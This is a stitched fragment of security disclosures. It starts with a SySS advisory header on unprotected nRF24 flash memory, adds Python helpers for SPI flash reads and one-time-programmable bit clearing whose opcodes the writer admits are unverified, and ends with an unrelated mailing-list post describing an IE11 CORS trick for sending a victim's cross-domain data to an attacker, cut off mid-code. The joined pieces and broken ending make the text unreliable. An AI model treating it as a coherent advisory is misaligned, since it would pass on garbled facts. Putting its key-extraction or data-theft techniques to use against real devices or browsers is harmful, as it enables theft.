This security vulnerability was found by Gerhard Klostermeier and Matthias Deeg of SySS GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7

E-Mail:
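Two things a practitioner would want to check on a device like this are whether read-back protection is actually set and what the one-time programmable constraint lets an attacker change. The Python below is an added illustration, not SySS code and not nrfprog. The facts come from the advisory: the flash is readable and writable over SPI because RDISMB was never enabled, and writes can only turn 1 bits into 0 bits. The SPI opcodes (RDSR = 0x05, READ = 0x03 with a 16-bit address) and the flash status register bit positions are my assumptions from the Nordic datasheet and must be verified for your silicon; all byte values are constructed sample data, not dumps from the devices, and the 16-byte key is the well-known AES test-vector key, not the product's key.

```python
"""Checks around the nRF24LE1 / nRF24LU1+ flash issue in SYSS-2016-033.

Added example, not SySS code and not nrfprog.  Opcodes and FSR bit positions
are assumptions taken from my reading of the Nordic datasheet; verify them.
All byte values below are constructed sample data.
"""
from typing import Dict, List, Optional

RDSR = 0x05  # read the flash status register (assumed opcode)
READ = 0x03  # read flash bytes at a 16-bit address (assumed opcode)

# Flash status register bit positions (assumed, verify with the datasheet).
FSR_BITS = {"RDISIP": 1, "RDISMB": 2, "INFEN": 3, "RDYN": 4, "WEN": 5}


def decode_fsr(fsr: int) -> Dict[str, bool]:
    """Split an FSR byte returned for RDSR into named flags."""
    return {name: bool((fsr >> bit) & 1) for name, bit in FSR_BITS.items()}


def readback_protected(fsr: int) -> bool:
    """True when RDISMB is set, i.e. the state the advisory found missing."""
    return decode_fsr(fsr)["RDISMB"]


def read_command(addr: int, length: int) -> bytes:
    """Bytes clocked out on MOSI to read `length` bytes starting at `addr`.
    The trailing zeros are dummy bytes shifted out while data comes back."""
    if not 0 <= addr <= 0xFFFF:
        raise ValueError("address must fit in 16 bits")
    if length < 0:
        raise ValueError("length must be non-negative")
    return bytes([READ, addr >> 8, addr & 0xFF]) + bytes(length)


def blocked_offsets(current: bytes, desired: bytes) -> List[int]:
    """Offsets where `desired` needs some bit raised from 0 to 1, which
    one-time programmable memory cannot do."""
    return [i for i, (c, d) in enumerate(zip(current, desired))
            if (d & ~c) & 0xFF]


def otp_writable(current: bytes, desired: bytes) -> bool:
    """Can `desired` be reached from `current` with 1->0 writes only?"""
    if len(current) != len(desired):
        raise ValueError("images differ in length")
    return not blocked_offsets(current, desired)


def program_plan(current: bytes, desired: bytes) -> Optional[List[int]]:
    """Offsets that actually need programming, or None if unreachable."""
    if not otp_writable(current, desired):
        return None
    return [i for i, (c, d) in enumerate(zip(current, desired)) if c != d]


def clear_bits(current: bytes, mask: bytes) -> bytes:
    """Result of programming `current` with every bit set in `mask` cleared.
    Any value can be driven to 0x00 this way; nothing can be raised."""
    return bytes((c & ~m) & 0xFF for c, m in zip(current, mask))


if __name__ == "__main__":
    print("FSR 0x00 ->", decode_fsr(0x00))               # nothing protected
    print("FSR 0x04 read-back protected?", readback_protected(0x04))
    print("SPI frame to read 4 bytes @0x0100:", read_command(0x0100, 4).hex())
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # sample key
    print("key -> all zeros writable?", otp_writable(key, bytes(16)))
    print("offsets blocked when raising bits:", blocked_offsets(key, b"\xff" * 16))
```

The last two lines make the practical point of the OTP restriction: an attacker cannot write an arbitrary key of their choice, but can always clear bits, so every key is reducible to all-zeros, and any firmware byte can be forced towards 0x00. Whether the firmware tolerates such a value is a separate question that the advisory does not answer; extracting the key by reading is the attack it does confirm.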
Re: [FD] IE11 is not following CORS specification for local files
I made a small improvement to this attack. Using the IE File API (https://msdn.microsoft.com/en-us/library/hh772315(v=vs.85).aspx) an attacker would be able to create a web page with the content below and send it to a victim. A local file with the same content that I sent previously would be created in the default download folder. If the victim performs the three following clicks (Save, Open and Allow blocked content), an attacker would be able to perform any request to any domain and send the content to a domain which he/she controls. If the attacker is in a MitM position this could be more interesting, since the attacker could inject this content into an HTTP page and the victim will tend to rely on that. The next step would be to force the victim to click on the Save, Open and Allow blocked content buttons.

Saving Files Locally

if (typeof Blob !== "undefined") {
    demoBlobs();
}

function demoBlobs() {
    var blob = new Blob(["